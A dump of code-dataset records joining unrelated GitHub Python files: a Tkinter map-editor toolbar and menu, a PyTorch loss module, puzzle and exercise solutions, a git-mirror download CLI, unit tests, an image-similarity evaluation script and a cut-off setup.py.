menubar.zoomToGlobal)\r\n self.zoom_to_global.set_icon('zoom to global.png', width = 20, height = 20)\r\n self.zoom_to_global.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n Label(self, text = ' ', bg = 'LightCyan').pack(side = LEFT)\r\n\r\n self.edit_layer = IconButton(self, text = 'edit layer', state = 'disabled', command = menubar.editLayer)\r\n self.edit_layer.set_icon('edit layer.png', width = 20, height = 20)\r\n self.edit_layer.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n Label(self, text = ' ', bg = 'LightCyan').pack(side = LEFT)\r\n \r\n self.draw = IconButton(self, text = 'draw', state = 'disabled', command = menubar.draw)\r\n self.draw.set_icon('draw.png', width = 20, height = 20)\r\n self.draw.pack(side = \"left\", padx = 2, pady = 2)\r\n\r\n self.redo = IconButton(self, text = 'redo', state = 'disabled', command = menubar.redo)\r\n self.redo.set_icon('redo.png', width = 20, height = 20)\r\n self.redo.pack(side = \"right\", padx = 2, pady = 2)\r\n \r\n self.undo = IconButton(self, text = 'undo', state = 'disabled', command = menubar.undo)\r\n self.undo.set_icon('undo.png', width = 20, height = 20)\r\n self.undo.pack(side = \"right\", padx = 2, pady = 2)\r\n\r\n self.exit = IconButton(self, text = 'exit', command = menubar.exit)\r\n self.exit.set_icon('exit.png', width = 20, height = 20)\r\n self.exit.pack(side = \"right\", padx = 2, pady = 2)\r\n\r\n self.setFileDisabled(False)\r\n self.setViewDisabled(False)\r\n self.setEditDisabled(False)\r\n self.setDrawDisabled(False)\r\n\r\n def setFileDisabled(self, b):\r\n #不启用按钮\r\n if b:\r\n self.save_file['state'] = 'disabled'\r\n self.new_layer['state'] = 'disabled'\r\n self.del_layer['state'] = 'disabled'\r\n #启用按钮\r\n else:\r\n self.new_layer['state'] = 'normal'\r\n self.del_layer['state'] = 'normal'\r\n self.save_file['state'] = 'normal'\r\n\r\n def setViewDisabled(self, b):\r\n if b:\r\n self.pan['state'] = 'disabled'\r\n self.zoom_in['state'] = 'disabled'\r\n self.zoom_out['state'] = 'disabled'\r\n self.zoom_to_global['state'] = 'disabled'\r\n else:\r\n self.pan['state'] = 'normal'\r\n self.zoom_in['state'] = 'normal'\r\n self.zoom_out['state'] = 'normal'\r\n self.zoom_to_global['state'] = 'normal'\r\n\r\n def setEditDisabled(self, b):\r\n if b:\r\n self.edit_layer['state'] = 'disabled'\r\n else:\r\n self.edit_layer['state'] = 'normal'\r\n\r\n def setDrawDisabled(self, b):\r\n if b:\r\n self.draw['state'] = 'disabled'\r\n self.redo['state'] = 'disabled'\r\n self.undo['state'] = 'disabled'\r\n else:\r\n self.draw['state'] = 'normal'\r\n self.redo['state'] = 'normal'\r\n self.undo['state'] = 'normal'\r\n \r\n\r\n\r\nclass MMenu(Menu):\r\n def __init__(self, master, pMap, cv, eye, lFrm, sFrm, mapFile):\r\n Menu.__init__(self, master)\r\n self.pMap = pMap\r\n self.cv = cv\r\n self.eye = eye\r\n self.lFrm = lFrm\r\n self.sFrm = sFrm\r\n self.tFrm = None\r\n self.mapFile = mapFile\r\n fileMenu = Menu(self)\r\n viewMenu = Menu(self)\r\n editMenu = Menu(self)\r\n generalizeMenu = Menu(self)\r\n\r\n fileMenu.add_command(label = '打开', command = self.openFile)\r\n fileMenu.add_command(label = '新建', command = self.newMap)\r\n fileMenu.add_command(label = '保存', command = self.saveFile)\r\n fileMenu.add_command(label = '另存为', command = self.saveFileAs)\r\n fileMenu.add_separator()\r\n fileMenu.add_command(label = '导入', command = self.importLayer)\r\n fileMenu.add_command(label = '导出', command = self.exportLayer)\r\n fileMenu.add_command(label = '导出到数据库', command = self.exportData)\r\n fileMenu.add_command(label = '从数据库读取', command = self.importData)\r\n self.add_cascade(label = '文件', menu = fileMenu)\r\n\r\n viewMenu.add_command(label = '漫游', command = self.pan)\r\n viewMenu.add_command(label = '放大', command = self.zoomIn)\r\n viewMenu.add_command(label = '缩小', command = self.zoomOut)\r\n viewMenu.add_command(label = '缩放至全地图', command = self.zoomToGlobal)\r\n self.add_cascade(label = '视图', menu = viewMenu)\r\n \r\n editMenu.add_command(label = '新建图层', command = self.newLayer)\r\n editMenu.add_command(label = '删除图层', command = self.delLayer)\r\n editMenu.add_command(label = '图层编辑', command = self.editLayer)\r\n self.add_cascade(label = '编辑', menu = editMenu)\r\n\r\n self.add_cascade(label = '数据压缩', menu = generalizeMenu)\r\n generalizeMenu.add_command(label = '线压缩', command = self.lineCompression)\r\n self.master['menu'] = self\r\n\r\n def setTFrm(self, tFrm):\r\n self.tFrm = tFrm\r\n\r\n\r\n def openFile(self):\r\n fName = filedialog.askopenfilename(filetypes = ((\"mpy\", \"*.mpy\"), (\"All files\", \"*.*\")))\r\n\r\n if fName != '':\r\n self.pMap = readData(fName)\r\n self.master.pMap = self.pMap\r\n self.mapFile = fName\r\n\r\n if self.pMap == 'ERRORFILE':\r\n messagebox.showinfo(\"失败\", \"打开文件失败!\")\r\n elif self.pMap == '':\r\n return\r\n else:\r\n self.sFrm.setState(' ')\r\n self.pMap.setCv(self.cv)\r\n self.cv.setMap(self.pMap)\r\n self.pMap.setHawkeye(self.eye) \r\n self.eye.setMap(self.pMap) \r\n self.eye.invalidate() \r\n self.cv['bg'] = 'white'\r\n self.cv.oldMouseState = 'VIEW'\r\n self.lFrm.setMap(self.pMap)\r\n self.cv.invalidate()\r\n self.cv.invalidateLFrm()\r\n\r\n\r\n def newMap(self):\r\n r = WinMapName(self.master)\r\n if r.result == None:\r\n return\r\n\r\n self.pMap = Map(r.result, 0)\r\n self.master.pMap = self.pMap\r\n self.mapFile = ''\r\n \r\n self.sFrm.setState(' ')\r\n self.pMap.setCv(self.cv)\r\n self.cv.setMap(self.pMap)\r\n self.pMap.setHawkeye(self.eye) \r\n self.eye.setMap(self.pMap) \r\n self.eye.invalidate() \r\n self.cv['bg'] = 'white'\r\n self.cv.oldMouseState = 'VIEW'\r\n self.lFrm.setMap(self.pMap)\r\n self.cv.invalidate()\r\n self.cv.invalidateLFrm()\r\n\r\n def saveFile(self):\r\n if self.mapFile != '' and self.pMap != '':\r\n if saveData(self.mapFile, self.pMap):\r\n messagebox.showinfo(\"成功\", \"保存文件成功!\")\r\n else:\r\n messagebox.showinfo(\"失败\", \"保存文件失败!\") \r\n\r\n\r\n def saveFileAs(self):\r\n if self.pMap == '':\r\n return\r\n \r\n fName = filedialog.asksaveasfilename(filetypes = ((\"mpy\", \"*.mpy\"), (\"All files\", \"*.*\")))\r\n print(fName)\r\n if fName != '':\r\n if not fName.endswith('.mpy'):\r\n fName += '.mpy'\r\n \r\n if saveData(fName, self.pMap):\r\n messagebox.showinfo(\"成功\", \"保存文件成功!\")\r\n self.mapFile = fName\r\n else:\r\n messagebox.showinfo(\"失败\", \"保存文件失败!\")\r\n\r\n def importData(self):\r\n ##传入存储地图的数据表名称\r\n mapTable = 'map_table'\r\n self.pMap = importDataFromdatabase(mapTable)\r\n self.master.pMap = self.pMap\r\n if self.pMap:\r\n messagebox.showinfo(\"成功\", \"从数据库读取成功!\")\r\n \r\n if self.pMap == '':\r\n messagebox.showinfo(\"失败\", \"数据表文件为空!\")\r\n return\r\n else:\r\n self.sFrm.setState(' ')\r\n self.pMap.setCv(self.cv)\r\n self.cv.setMap(self.pMap)\r\n self.pMap.setHawkeye(self.eye) \r\n self.eye.setMap(self.pMap) \r\n self.eye.invalidate() \r\n self.cv['bg'] = 'white'\r\n self.cv.oldMouseState = 'VIEW'\r\n self.lFrm.setMap(self.pMap)\r\n self.cv.invalidate()\r\n self.cv.invalidateLFrm()\r\n\t\t\r\n def exportData(self):\r\n if self.pMap == '':\r\n return\r\n if exportData2database(self.pMap):\r\n messagebox.showinfo(\"成功\", \"导出文件到数据库成功!\")\r\n\r\n def draw(self):\r\n if self.pMap == '':\r\n return\r\n self.pMap.clearSelectedObjs()\r\n self.cv.hasSelect = False\r\n \r\n if self.cv.mouseMode == 'EDIT':\r\n self.cv.setMouseMode('DRAW')\r\n self.sFrm.setState('图层编辑-绘图')\r\n elif self.cv.mouseMode == 'DRAW':\r\n self.cv.setMouseMode('EDIT')\r\n if messagebox.askyesno(\"保存\", \"是否保存绘制?\"):\r\n self.cv.addObjs2layer()\r\n self.sFrm.setState('图层编辑')\r\n\r\n self.cv.invalidate()\r\n \r\n \r\n def newLayer(self):\r\n if self.pMap == '':\r\n return\r\n\r\n layerConfig = WinCreateLayer(self.master)\r\n if layerConfig.result == None:\r\n return\r\n \r\n if layerConfig.result[0] == '':\r\n layerName = '未命名'\r\n else:\r\n layerName = layerConfig.result[0]\r\n\r\n layer = Layer(layerName, layerConfig.result[1], layerConfig.result[2][-3:], 0)\r\n self.pMap.appendLayer(layer)\r\n self.cv.invalidateLFrm()\r\n\r\n\r\n def delLayer(self):\r\n delfailed = False\r\n \r\n if self.pMap == '':\r\n return\r\n\r\n r = WinDeleteLayer(self.master)\r\n if r.result == None:\r\n return\r\n\r\n layerNo = r.result[0:2].strip()\r\n if layerNo.isdigit():\r\n if self.pMap.delLayer(int(layerNo)-1):\r\n self.cv.invalidate()\r\n self.cv.invalidateLFrm()\r\n delFailed = True\r\n if delFailed == False:\r\n messagebox.showinfo(\"失败\", \"删除图层失败!\")\r\n\r\n\r\n def editLayer(self):\r\n if self.pMap == '':\r\n return\r\n if self.cv.mouseMode != 'EDIT':\r\n if self.cv.mouseMode == 'DRAW':\r\n if len(self.cv.objs) > 0:\r\n if messagebox.askyesno(\"保存\", \"是否保存绘制?\"):\r\n self.cv.addObjs2layer()\r\n else:\r\n r = WinEditLayer(self.master)\r\n if r.result == None:\r\n return\r\n\r\n layerNo = r.result[0:2].strip()\r\n if layerNo.isdigit():\r\n self.cv.setMouseMode('EDIT')\r\n self.pMap.layers[int(layerNo)-1].setEdit(True)\r\n self.cv.setEditLayer(self.pMap.layers[int(layerNo)-1])\r\n self.sFrm.setState('图层编辑')\r\n else:\r\n self.cv.setMouseMode(None)\r\n if self.cv.layerEditing != None:\r\n self.cv.layerEditing.setEdit(False)\r\n self.cv.layerEditing.clearSelectedObjs()\r\n self.cv.hasSelect = False\r\n self.cv.setEditLayer(None)\r\n self.cv.invalidate()\r\n self.sFrm.setState(' ')\r\n\r\n #self.cv.invalidateLFrm()\r\n\r\n\r\n def importLayer(self):\r\n if self.pMap == '':\r\n return\r\n\r\n fName = filedialog.askopenfilename(filetypes = ((\"lpy\", \"*.lpy\"), (\"All files\", \"*.*\")))\r\n if fName != '': \r\n if importLayerData(fName, self.pMap):\r\n self.cv.invalidate()\r\n self.cv.invalidateLFrm()\r\n else:\r\n messagebox.showinfo(\"失败\", \"导入图层文件失败!\")\r\n\r\n\r\n def exportLayer(self):\r\n if self.pMap == '':\r\n return\r\n if self.pMap.lNum == 0:\r\n messagebox.showinfo(\"错误\", \"当前地图没有图层!\")\r\n return\r\n \r\n r = WinSelectLayer(self.master)\r\n if r.result == None:\r\n return\r\n\r\n fName = filedialog.asksaveasfilename(filetypes = ((\"lpy\", \"*.lpy\"), (\"All files\", \"*.*\")))\r\n if fName != '':\r\n if not fName.endswith('.lpy'):\r\n fName += '.lpy'\r\n \r\n if exportLayerData(fName, r.result):\r\n messagebox.showinfo(\"成功\", \"导出图层文件成功!\")\r\n else:\r\n messagebox.showinfo(\"失败\", \"导出图层文件失败!\")\r\n\r\n def pan(self):\r\n if self.pMap == '':\r\n return\r\n if not self.cv.mouseMode == 'EDIT' and not self.cv.mouseMode == 'DRAW':\r\n self.sFrm.setState('视图')\r\n self.cv.setMouseMode('VIEW')\r\n \r\n\r\n def zoomIn(self):\r\n if self.pMap == '':\r\n return\r\n pt = [0, 0]\r\n pt[0] = (self.cv.curExt[0] + self.cv.curExt[2])*1.0/2\r\n pt[1] = (self.cv.curExt[1] + self.cv.curExt[3])*1.0/2\r\n self.cv.zoom(pt, 1.1)\r\n\r\n def zoomOut(self):\r\n if self.pMap == '':\r\n return\r\n pt = [0, 0]\r\n pt[0] = (self.cv.curExt[0] + self.cv.curExt[2])*1.0/2\r\n pt[1] = (self.cv.curExt[1] + self.cv.curExt[3])*1.0/2\r\n self.cv.zoom(pt, 0.9)\r\n\r\n def zoomToGlobal(self):\r\n if self.pMap == '':\r\n return\r\n for i in range(4):\r\n self.cv.disExt[i] = self.cv.datExt[i]\r\n self.cv.affiCV.calcScale(self.cv.disExt, self.cv.winExt)\r\n self.cv.invalidate()\r\n\r\n def undo(self):\r\n if self.pMap == '':\r\n return\r\n \r\n if self.cv.mouseMode == 'DRAW' and len(self.cv.objs) > 0:\r\n self.cv.tObjs.append(self.cv.objs.pop())\r\n self.cv.obj = Obj(0, 'null')\r\n self.cv.invalidate()\r\n self.cv.drawObjs()\r\n \r\n def redo(self):\r\n if self.pMap == '':\r\n return\r\n \r\n if self.cv.mouseMode == 'DRAW' and len(self.cv.tObjs) > 0:\r\n self.cv.objs.append(self.cv.tObjs.pop())\r\n self.cv.obj = Obj(0, 'null')\r\n self.cv.invalidate()\r\n self.cv.drawObjs()\r\n \r\n def exit(self):\r\n if self.pMap == '':\r\n return\r\n \r\n #从视图状态退出,如果之前状态为编辑或绘制,继续之前状态;否则退出视图状态\r\n if self.cv.mouseMode == 'VIEW':\r\n if self.cv.oldMouseMode == 'EDIT' or self.cv.oldMouseMode == 'DRAW':\r\n self.cv.setMouseMode(self.cv.oldMouseMode)\r\n else:\r\n self.cv.setMouseMode(None)\r\n self.sFrm.setState(' ')\r\n \r\n #从编辑或者绘制状态退出至无状态\r\n elif self.cv.mouseMode == 'EDIT' or self.cv.mouseMode == 'DRAW':\r\n if self.cv.mouseMode == 'DRAW':\r\n if len(self.cv.objs) > 0:\r\n if messagebox.askyesno(\"保存\", \"是否保存绘制?\"):\r\n self.cv.addObjs2layer()\r\n if self.cv.layerEditing != None:\r\n self.cv.layerEditing.setEdit(False)\r\n self.cv.layerEditing.clearSelectedObjs()\r\n self.cv.hasSelect = False\r\n self.cv.setMouseMode(None)\r\n self.cv.setEditLayer(None)\r\n self.cv.invalidate()\r\n self.sFrm.setState(' ')\r\n self.cv.invalidateLFrm()\r\n\r\n def lineCompression(self):\r\n if self.pMap == '':\r\n return\r\n\r\n self.cv.lineCompression()\r\n\r\n \r\nclass SFrm(Frame):\r\n def __init__(self, master):\r\n Frame.__init__(self, bg = 'LightBlue')\r\n \r\n self.clock = Label(self, font=('times', 10, 'bold'), bg='LightBlue')\r\n self.clock.pack(side = RIGHT)\r\n\r\n dateNow = datetime.datetime.now().strftime(\"%Y-%m-%d\")\r\n self.date = Label(self, text = dateNow, font=('times', 10, 'bold'), bg='LightBlue')\r\n self.date.pack(side = RIGHT)\r\n\r\n self.co = Label(self, text = '', font=('times', 10), bg='LightBlue')\r\n self.co.pack(side = LEFT)\r\n\r\n Label(self, text = ' ', bg='LightBlue').pack(side = LEFT)\r\n \r\n self.state = Label(self, text = '', font=('times', 8), bg='LightBlue')\r\n self.state.pack(side = LEFT)\r\n \r\n def setState(self, t):\r\n self.state['text'] = t\r\n \r\n def setCo(self, x, y):\r\n coStr = 'x = ' + str(x) + ', y = ' + str(y)\r\n self.co['text'] = coStr\r\n\r\n \r\n \r\n","repo_name":"susurrant/Mappy","sub_path":"GUICom.py","file_name":"GUICom.py","file_ext":"py","file_size_in_byte":21122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36055580366","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass gradL1(nn.Module):\n def __init__(self, alpha=1):\n super(gradL1, self).__init__()\n\n self.alpha = alpha\n\n def gradient(self,x):\n # x: (b,c,h,w), float32 or float64\n # dx, dy: (b,c,h,w)\n\n h_x = x.size()[-2]\n w_x = x.size()[-1]\n \n left = x\n right = F.pad(x, [0, 1, 0, 0])[:, :, :, 1:]\n top = x\n bottom = F.pad(x, [0, 0, 0, 1])[:, :, 1:, :]\n\n dx, dy = right - left, bottom - top\n \n dx[:, :, :, -1] = 0\n dy[:, :, -1, :] = 0\n\n return dx, dy\n\n def forward(self, sr, hr):\n \n # gradient\n gen_dx, gen_dy = self.gradient(sr)\n gt_dx, gt_dy = self.gradient(hr)\n \n grad_diff_x = torch.abs(gt_dx - gen_dx)\n grad_diff_y = torch.abs(gt_dy - gen_dy)\n\n # average\n return torch.mean(grad_diff_x ** self.alpha + grad_diff_y ** self.alpha)\n\n\n# wrapper of loss functions\nclass Loss(nn.modules.loss._Loss):\n def __init__(self, args):\n super(Loss, self).__init__()\n\n self.loss = []\n self.loss_module = nn.ModuleList()\n for loss in args.loss.split('+'):\n weight, loss_type = loss.split('*')\n if loss_type == 'L1':\n loss_function = nn.L1Loss()\n elif loss_type.find('gradL1') >= 0:\n loss_function = gradL1()\n\n self.loss.append({\n 'type': loss_type,\n 'weight': float(weight),\n 'function': loss_function}\n )\n\n if len(self.loss) > 1:\n self.loss.append({'type': 'Total', 'weight': 0, 'function': None})\n\n for l in self.loss:\n if l['function'] is not None:\n self.loss_module.append(l['function'])\n\n device = torch.device('cuda' if args.cuda else 'cpu')\n self.loss_module.to(device)\n \n if args.cuda:\n self.loss_module = nn.DataParallel(self.loss_module)\n\n def forward(self, sr, hr):\n loss = 0\n losses = {}\n for i, l in enumerate(self.loss):\n if l['function'] is not None:\n _loss = l['function'](sr, hr)\n effective_loss = l['weight'] * _loss\n losses[l['type']] = effective_loss\n loss += effective_loss\n \n return loss, losses\n","repo_name":"hannahhalin/TAIN","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4511373383","text":"import matplotlib.pyplot as plt\nimport networkx as nx\nimport re\n\nfrom collections import Counter, defaultdict\n\n\nwith open(\"input\") as f:\n\ttmp = [line.split(\" -> \") for line in f.readlines()]\n\n\nweights = {}\nG = nx.DiGraph()\nfor line in tmp:\n\tname, weight = line[0].split('(')\n\tweight = int(re.findall(r'\\d+', weight)[0])\n\tname = name.strip()\n\tweights[name] = weight\n\tif len(line) > 1:\n\t\tchildren = [l.strip() for l in line[1].split(',')]\n\t\tfor child in children:\n\t\t\tG.add_edge(name, child, weight=weight)\n\n# part I\nroot = [n for n, d in G.in_degree() if d==0][0]\nprint(root)\n\n# part II\ndef weight_subtree(tree, w=0):\n\tif G.degree(tree) == 0:\n\t\treturn w + weights[tree]\n\telse:\n\t\treturn weights[tree] + sum(weight_subtree(t, w) for t in G[tree])\n\ndiff = 0\nwhile True:\n\tweights_tmp = {tree: weight_subtree(tree) for tree in G[root]}\n\tone_out = Counter(weights_tmp.values()).most_common()[-1][0]\n\tnew_diff = max(weights_tmp.values()) - min(weights_tmp.values())\n\tif new_diff == 0:\n\t\tprint(weights[root] - diff)\n\t\tbreak\n\troot = list(weights_tmp.keys())[list(weights_tmp.values()).index(one_out)]\n\tdiff = new_diff\n\t\n\n\n\n\n","repo_name":"madsthoisen/advent_of_code","sub_path":"2017/dec07/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32962260602","text":"#Exercício 02 - Fibonacci\r\n\r\n#Input do número inteiro e criação da lista\r\nnum = int(input(\"Insira um número inteiro: \"))\r\nfibonacci = [0, 1]\r\n\r\n#Enquanto a variável Fibonacci[-1] for menor que a variável num\r\nwhile fibonacci[-1] < num:\r\n#Realiza a adição do valor baseado na variavel e o indice dentro dela (-1 e -2)\r\n fibonacci.append(fibonacci[-1] + fibonacci[-2])\r\n\r\n#Se a variável num estiver em fibonacci, será exibido um print de o número pertence ou não à sequência.\r\nif num in fibonacci:\r\n print(num, \"pertence à sequência de Fibonacci.\")\r\nelse:\r\n print(num, \"não pertence à sequência de Fibonacci.\")","repo_name":"netohost/TargetSistemas","sub_path":"02.Fibonacci.py","file_name":"02.Fibonacci.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14979586432","text":"\n\nclass Solution:\n def uniquePaths(self, m: int, n: int) -> int:\n row = [1] * n\n print(row)\n for _ in range(m-1):\n newrow = [1] * n\n for j in range(n-2,-1,-1):\n newrow[j] = row[j] + newrow[j+1]\n row = newrow\n print(row)\n return row[0]\n\n\nif __name__ == \"__main__\":\n s = Solution()\n grid_size = (30,12)\n \n print(s.uniquePaths(grid_size[0],grid_size[1]))","repo_name":"thakkarvishal226/Data-structure-and-algorithms","sub_path":"LeetCode 75/62_Unique Paths.py","file_name":"62_Unique Paths.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"407259318","text":"def table(level):\n for j, jt in enumerate(level):\n for i, it in enumerate(jt):\n print(it, end=' ')\n print('')\n\nlevel = \"\"\"\\\n#######\n# #\n# #\n#. # #\n#. $$ #\n#.$$ #\n#.# @#\n#######\"\"\"\n\nlevel = \"\"\"\\\n#######\n# @#\n# #####\n# #\n# # #\n# #$#\n# #.#\n#######\"\"\"\nlevel = level.splitlines()\n\n\nstate = [0]\n\ntable(level)\n\n\n\ndef isWall(d):\n return level[d[0]][d[1]] == \"#\"\n\ndef dirs(atual):\n i, j = atual\n return [(i + 1, j),(i - 1, j),(i, j + 1),(i, j - 1)]\n\ndef neigh(atual):\n ng = []\n for d in dirs(atual[0]):\n if isWall(d): continue\n ng = ng + [d]\n return ng\n\ndef BFS2(state):\n c = []\n v = set()\n p = [state]\n while p:\n atual = p.pop()\n if atual in v: continue\n for prox in neigh(atual):\n p = [prox] + p\n v.add(atual)\n c = c + [atual[0]]\n return c\n\n\nstate = [0]\nfor i, line in enumerate(level):\n for j, ch in enumerate(line):\n if ch == \"@\": state[0] = (i, j)\n\nprint (BFS2(state))\n\ntable(level)\n\n\n\n\n'''\n ####\n ##. ##\n##### . #\n# # # #\n# $ # # #\n# $ @ #\n###### ##\n ####\n\n\nSolution:\nlluullddRRRRuruurrdddldlUUUUdddllluulDldRRRRuruurrdddldlUUU\n\n\nhttp://www.sokobano.de/wiki/index.php?title=Optimizer\n\n'''","repo_name":"elsioantunes/cloud9","sub_path":"(Paralela)/sokoban/sokoban0c.py","file_name":"sokoban0c.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21535474160","text":"# 아래 코드는 문자열에서 모음의 개수를 찾는 코드입니다. \n# 코드에서 오류를 찾아 원인을 적고, 수정하세요.\n\n# word = \"HappyHacking\"\n\n# count = 0\n\n# for char in word:\n# if char == \"a\" or \"e\" or \"i\" or \"o\" or \"u\":\n# count += 1\n\n# print(count)\n\n\nword = ('HappyHaksick')\n\ncount = 0\n\nfor char in word:\n if char in 'aeiou':\n count = count + 1\n\nprint(count)\n\n# 14일 수업때 말씀하셧던 위의 예제는 a만 출력하게 되므로 수정하였습니다.\n# 예제와 같이 하려면 char == 'a', char == 'e' 이런식으로 풀어줘야 합니다!","repo_name":"1c0332zz/TIL","sub_path":"python/실습 풀이/예제/08.예제 [오류] 모음의 개수 찾기.py","file_name":"08.예제 [오류] 모음의 개수 찾기.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"25937860906","text":"#!/usr/bin/python\nimport typer\nimport subprocess # 导入子模块\n#from download import download\n#import wget\nfrom Cit import cit_url\nimport requests\nfrom tqdm.auto import tqdm\n#from .main import app\n\n\nCONTEXT_SETTINGS = dict(help_option_names=[\"-h\", \"--help\"])\n\n\n\n#app = typer.Typer(add_completion=False)\napp = typer.Typer(help=\"从github的下载速度��高一万倍\",add_completion=False)\n\ndef main(\n name: str = typer.Argument(\n \"Wade Wilson\", help=\"Who to greet\", show_default=\"Deadpoolio the amazing's name\"\n )\n):\n typer.echo(f\"Hello {name}\")\n\n\n#@app.command()\ndef 地址序号():\n try :\n num = int(input('请输入一个数字(默认为0):') )\n except ValueError :\n num = 0\n return num\n\n@app.command()\ndef change(url:str):\n \"\"\" \n 链接转换:cit change \n \"\"\"\n s = cit_url.main(url)\n \n \n\n\n@app.command()\ndef clone(url:str ):\n \"\"\"\n git加速:cit clone \n \"\"\"\n\n \n 最终地址 = cit_url.main(url)\n git_start = subprocess.call(['git', 'clone',最终地址]) \n \n\n@app.command()\ndef sub(url:str):\n \"\"\"\n 子模块加速:cit sub \n \"\"\"\n 最终地址 = cit_url.main(url) \n git_start = subprocess.call(['git', 'submodule','add', 最终地址]) \n\n@app.command()\ndef get(url:str):\n \"\"\" \n 文件下载:cit get \n \"\"\"\n \n 下载地址 = cit_url.main(url)\n print(f'下载地址是:{下载地址}')\n file_name = 下载地址.split('/')[-1]\n typer.echo(f\"开始下载文件:{file_name}\")\n r = requests.get(下载地址,stream=True)\n with tqdm.wrapattr(open(file_name, \"wb\"), \"write\", miniters=1,\n total=int(r.headers.get('content-length', 0)),\n desc=file_name) as fout:\n for chunk in r.iter_content(chunk_size=4096):\n fout.write(chunk)\n\n\"\"\" if __name__ == \"__main__\":\n app() \"\"\"\n\n\n\n\n \n #typer.echo(f'正在执行下载命令:{下载命令}') \n\n\"\"\" @app.command()\ndef hello(name: str):\n typer.echo(f\"Hello {name}\")\n\n\n@app.command()\ndef goodbye(name: str, formal: bool = False):\n if formal:\n typer.echo(f\"Goodbye Ms. {name}. Have a good day.\")\n else:\n typer.echo(f\"Bye {name}!\") \"\"\"\n\n\n","repo_name":"solider245/cit","sub_path":"Cit/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"53"} +{"seq_id":"34381171146","text":"from unittest import TestCase\nfrom unittest.mock import Mock, patch\n\nfrom cibyl.cli.main import OutputStyle, raw_parsing\nfrom cibyl.exceptions.cli import InvalidArgument\n\n\nclass TestRawParsing(TestCase):\n \"\"\"Tests for the -f CLI option.\n \"\"\"\n\n def test_default_output(self):\n \"\"\"Checks the default value for the option.\n \"\"\"\n args = raw_parsing([])\n\n self.assertTrue(OutputStyle.COLORIZED, args['output_style'])\n\n @patch('cibyl.cli.main.OutputStyle.from_key')\n def test_f_arg(self, parse_call: Mock):\n \"\"\"Checks that user's input is read.\n \"\"\"\n style = 'raw'\n\n parse_call.return_value = OutputStyle.TEXT\n\n args = raw_parsing(['', '-f', style])\n\n self.assertTrue(OutputStyle.TEXT, args['output_style'])\n\n parse_call.assert_called_once_with(style)\n\n @patch('cibyl.cli.main.OutputStyle.from_key')\n def test_output_arg(self, parse_call: Mock):\n \"\"\"Checks that --output-format also works.\n \"\"\"\n output = 'raw'\n\n parse_call.return_value = OutputStyle.TEXT\n\n args = raw_parsing(['', '--output-format', output])\n\n self.assertTrue(OutputStyle.TEXT, args['output_style'])\n\n parse_call.assert_called_once_with(output)\n\n @patch('cibyl.cli.main.OutputStyle.from_key')\n def test_invalid_output_arg(self, parse_call: Mock):\n \"\"\"Checks reaction to unknown style.\n \"\"\"\n\n def raise_error(_):\n raise NotImplementedError\n\n output = 'invalid'\n\n parse_call.side_effect = raise_error\n\n with self.assertRaises(InvalidArgument):\n raw_parsing(['', '--output-format', output])\n\n parse_call.assert_called_once_with(output)\n","repo_name":"RedHatCRE/cibyl","sub_path":"tests/cibyl/unit/cli/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"15868201093","text":"import sys, os\nfrom PIL import Image\nimport numpy as np\nfrom skimage.measure import compare_ssim as ssim\n\ndef RootMeanSquareDeviation(image_out, image_ref):\n\tassert image_out.shape == image_ref.shape, \"Eval error: Image Size mismatch\"\n\treturn np.linalg.norm(image_out - image_ref)/(255.0*(image_ref.size**0.5))\n\ndef StructuralSimilarityIndex(image_out, image_ref):\n\tassert image_out.shape == image_ref.shape, \"Eval error: Image Size mismatch\"\n\treturn ssim(image_out, image_ref, multichannel=True)\n\nroot_dir = sys.argv[1]\nssim_list = []\nrmsd_list = []\nfor idx in range(len(os.listdir(root_dir+'/target/'))):\n\timg1 = np.asarray(Image.open(root_dir+'/output/'+str(idx+1)+'.jpg'))\n\timg2 = np.asarray(Image.open(root_dir+'/target/'+str(idx+1)+'.jpg'))\n\tssim_list.append(StructuralSimilarityIndex(img1,img2))\n\trmsd_list.append(RootMeanSquareDeviation(img1,img2))\n\nprint('Avg. SSIM: '+ str(np.mean(ssim_list)))\nprint('Avg. RMSD: '+ str(np.mean(rmsd_list)))","repo_name":"darth-c0d3r/pix2pix","sub_path":"eval_metrics.py","file_name":"eval_metrics.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73036340967","text":"from __future__ import print_function\nfrom setuptools import setup, find_packages\nfrom setuptools.command.test import test as TestCommand\nimport io\nimport codecs\nimport os\nimport sys\n\nimport CosmoPhotoz.photoz as photoz\n\nhere = os.path.abspath(os.path.dirname(__file__))\ndef readin(*filenames, **kwargs):\n encoding = kwargs.get('encoding', 'utf-8')\n sep = kwargs.get('sep', '\\n')\n buf = []\n for filename in filenames:\n with io.open(filename, encoding=encoding) as f:\n buf.append(f.read())\n return sep.join(buf)\n\n# Convert the github markup to pypi reStructuredText\n# try:\n# import pypandoc\n# long_description = pypandoc.convert(source=readin('README.md'), to='rst', format='md')\n# except ImportError:\n# print(\"warning: pypandoc module not found, could not convert Markdown to RST\")\n\nlong_description = readin('README.rst')\n\n#class PyTest(TestCommand):\n# def finalize_options(self):\n# 